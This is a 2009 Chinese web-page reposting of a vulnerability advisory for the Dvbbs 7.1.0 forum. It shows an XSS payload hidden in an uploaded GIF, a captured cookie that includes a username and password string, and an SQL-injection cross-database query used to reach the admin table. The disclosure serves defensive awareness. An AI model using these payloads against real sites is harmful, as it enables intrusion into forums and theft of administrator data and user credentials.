当前位置: 首页 > 图文教程 > 服务器 > 安全防护 > Dvbbs 7.1.0 cookie 存在泄露绝对路径漏洞

安全防护
防止黑客入侵最高招:关闭系统端口
应用服务器的常见安全管理漏洞
网站安全维护的基石 做好远程服务器数据安全
分析并清除web服务器上的网页木马
网站防篡改 立即部署WEB应用防火墙(图)
网站安全需求分析
PubwinEP如何防止远程修改数据库
让黑客远离DNS和SMTP服务器攻击
服务器安全管理的四个注意事项
从入侵者角度谈服务器安全基本配置
防黑 加强Linux安全管理的方法
检测Linux系统是否被黑的技巧
检测Linux系统是否被黑的系统技巧
权限控制策略 提高数据库服务器安全
网站服务器通用和专用保护方法比较分析
保证Linux系统安全 从防范漏洞做起
Windows防范非法入侵的七大绝招
确保服务器稳定七大注意事项
用脚本类IDS抵御针对WEB的攻击
解析拒绝服务攻击的攻击技术

安全防护 中的 Dvbbs 7.1.0 cookie 存在泄露绝对路径漏洞


出处:互联网   整理: 软晨网(RuanChen.com)   发布: 2009-10-29   浏览: 56 ::
收藏到网摘: n/a

厂商名字:动网先锋论谈
厂商地址:http://www.dvbbs.net/
漏洞程序:Dvbbs 7.1.0
漏洞描述:
Dvbbs 7.1.0 的Cookie存在泄露站点的绝对路径的漏洞,攻击者可以配合其它技术,实现SQL跨库查询等。
漏洞利用例子:
一、泄露绝对漏洞测试:
对官方的测试站点:bbs.dvbbs.net
上传一张图,代码如下:
GIF89a
<script>alert(document.cookie)</script>
抓包得到cookie如下
Cookie: ASPSESSIONIDSSDSCBQD=NHANOBNCAPCPAMCFMAGDIJCB;
dwebdvbbs7%2E1%2E0=UserID=617054&usercookies=1&
userclass=%D0%C2%CA%D6%C9%CF%C2%B7&
username=linzibct&password=t8ob621664s5v6HL&userhidden=2
&StatUserID=2189992004; Dvbbs=
分析cookie可以得到站点的绝对路径如下:
d:\\web\\dvbbs7为论谈的绝对路径
二、攻击延伸:
www.host.com
主程序存在sql注入漏洞,但是找不到表名和字段名。
注入点假设:
www.host.com\\linzi.asp?fuck=you
论谈为dvbbs 7.1.0 ,数据库为data\\\\dvbbs.asp,做了防下载处理.
利用上面的动网暴路径,抓包得到绝对路径为 d:\\www\\dvbbs\\data\\dvbbs.asp
实现跨库查询如下:
www.host.com\\linzi.asp?fuck=you and (select count(*)
from dv_admin in "d:\\www\\dvbbs\\data\\dvbbs.asp")
官方补丁:
尚无